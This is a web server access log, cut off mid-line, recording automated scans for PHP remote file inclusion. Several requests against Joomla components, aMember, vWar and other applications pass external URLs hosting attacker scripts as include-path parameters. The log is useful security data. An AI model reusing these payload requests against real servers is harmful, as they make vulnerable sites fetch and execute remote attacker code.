80.68.203.22 - - [13/Apr/2008:22:22:34 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:22:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
148.244.247.47 - - [13/Apr/2008:22:23:06 -0700] "GET /logs/access_080211.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://wances.100webspace.net/tools/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
148.244.247.47 - - [13/Apr/2008:22:23:06 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://wances.100webspace.net/tools/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
148.244.247.47 - - [13/Apr/2008:22:23:06 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://wances.100webspace.net/tools/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.214.73.237 - - [13/Apr/2008:22:24:13 -0700] "GET /logs/access_080121.log//init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:24:38 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:24:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:24:39 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:25:54 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:25:54 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:25:55 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.13.42.169 - - [13/Apr/2008:22:26:24 -0700] "GET /logs/access_080225.log//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
212.13.42.169 - - [13/Apr/2008:22:26:24 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
212.13.42.169 - - [13/Apr/2008:22:26:27 -0700] "GET /logs/access_080225.log//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
212.13.42.169 - - [13/Apr/2008:22:26:27 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:22:29:26 -0700] "GET /logs/access_080211.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:22:29:26 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:22:29:26 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.6.77.238 - - [13/Apr/2008:22:30:22 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://lamers.za.pl/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:22:30:25 -0700] "GET /logs/access_080128.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.68.203.22 - - [13/Apr/2008:22:33:20 -0700] "GET /logs/access_080303.log/administrator/co